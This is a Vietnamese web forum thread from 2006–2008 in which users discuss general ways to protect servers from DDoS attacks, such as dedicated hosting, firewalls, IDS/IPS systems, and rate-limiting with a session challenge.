Mà nói chung, nếu có share thì chắc gì HanSho đã đủ "điều kiện cần" để sử dụng source đó (Server riêng, Ip riêng...) host shared thì chấp nhận thôi... :d

headboynt
15-06-2006, 18:18
Buồn vì không có cách chống tuyệt đối thôi, chứ cũng chẳng buồn vì chuyện không share, nếu như có share thì "anh ấy" đã public, không việc gì phải PM và dùng "mỹ nhân kế" :d
Mà nói chung, nếu có share thì chắc gì HanSho đã đủ "điều kiện cần" để sử dụng source đó (Server riêng, Ip riêng...) host shared thì chấp nhận thôi... :d
đúng đó, server tốt có thể chống đc ddos 80-90% rồi, vậy cần có server và Ip riêng và tốt thì ko sợ gì ddos cả.


--------------------------
Free Domain .Com.Net.Info.Org /1year
http://www.regdomainvn.com
liên hệ: YM: libivn1001

nguoitamky
17-06-2006, 19:32
đúng đó, server tốt có thể chống đc ddos 80-90% rồi, vậy cần có server và Ip riêng và tốt thì ko sợ gì ddos cả.Tuy 20% hay 10% còn lại là nhỏ nhưng nó đủ sức làm die tức khắc cái server tội nghiệp của bạn đó, nói chung chỉ cần cac actacker đồng lòng thì bạn khó mà chống đỡ trừ khi có người ngồi bên server 24/24 giờ để reset server liên tục thì còn may :D. Cần nói thêm là muốn dùng server và IP riêng bạn chắc chắn phải là một doanh nghiệp hay 1 đại gia nào đó thì mới có đủ tiền mà trả cho nó nhỉ ? :D

headboynt
12-07-2006, 21:34
dùng cái của VNISS.NET cũng được đó chứ. hoặc bản của Unclockvn

bluesky
13-07-2006, 01:10
Theo em nghĩ tại sao ko dùng firewall hay router của Cisco can thiệp mà phải dùng code???
Firewall hay router có thể phân phối các request 1 cách hợp lí trước khi các request này đến server.Vì vậy trườc khi có thể tác động đến server chính thì nó phải bước wa xác mấy anh chàng security này trước đã.

Kiến thức blue chỉ như trái nho so với mấy đại ca đây nên nhờ mọi người "khai sáng" cho Blue nha

headboynt
26-07-2006, 20:15
Theo em nghĩ tại sao ko dùng firewall hay router của Cisco can thiệp mà phải dùng code???
Firewall hay router có thể phân phối các request 1 cách hợp lí trước khi các request này đến server.Vì vậy trườc khi có thể tác động đến server chính thì nó phải bước wa xác mấy anh chàng security này trước đã.

Kiến thức blue chỉ như trái nho so với mấy đại ca đây nên nhờ mọi người "khai sáng" cho Blue nha
minh cung nghi nhu vay, dau tien dugn firewall truoc sau do moi chong ddos bang cac cach khac.

vvnho
28-07-2006, 16:41
Firewall cũng như cánh cửa, cũng tương tối an toàn nhưng không linh hoạt lắm. Nếu bạn đóng cửa một port nào đó thì ai vô ra gì cũng không được, mà mở ra hết thì vô ra thoải mái nhưng cũng dễ chết. Firewall không thể phát hiện ra xâm nhập bất hợp pháp vì hầu như nó không kiểm tra gói tin. Để phát hiện xâm nhập này thì phải đầu tư thêm một hệ thống IDS (Intrusion Detection System)hay cao hơn IPS (Intrusion Prevention Systems), giống như lính canh cửa để kiểm tra người ra vào. Nhưng một hệ thống IPS "thực sự" thì giá cả cao lắm chắc ai cũng biết.
Dùng phần mềm như các bác ở DDTH thảo luận mình thấy cũng tốt, rẽ tiền, linh hoạt có thể dễ dàng tùy biến. Nhất là đối với những người trẻ năng động, luôn nghiên cứu và chiến đấu với DDOS :D
Mình luôn hoan nghên các nghiên cứu của các bác. Khi nào có giải pháp hay share cho anh em dùng ké nhe :D
Có đôi lời đóng góp, nhưng kiến thức hạn chế mong các bạn góp ý kiến cũng cố thêm.
Cám ơn.

huaphuoctruong
20-03-2008, 11:14
Nếu như vậy thì có thể chống ddos bằng cách xử lý sơ bộ trước (xét số hit/giây) nếu vượt tầm server thì script chống ddos hoạt động đối với đối tượng đó bằng cách tạo 1 session xác nhận và bắt người đó nhập đúng session để tiếp tục.

Vả lại thông thường code thì không ai share đâu! Nếu share cho người khác nghiên cứu thì người ta biết rõ code đó ra sao rồi thì lại băng qua được. Bởi vậy code chống ddos tốt nhất ko nên share nếu mình đang xài hoặc là share bản khác bản đang xài thì tốt hơn.